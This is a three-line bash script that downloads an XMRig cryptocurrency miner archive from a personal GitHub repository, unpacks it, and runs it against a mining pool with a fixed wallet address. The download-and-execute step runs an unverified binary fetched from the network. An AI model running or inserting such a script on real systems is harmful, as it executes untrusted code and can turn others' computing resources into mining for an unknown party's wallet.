#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o sg.qrl.herominers.com:1166 -u solo:Q010500629be9c6c7cba9e13de63f849af3268bf521fe4c8fc13c9ddc6c4a033ec5490ff10feded -p gasken23 -a rx/0
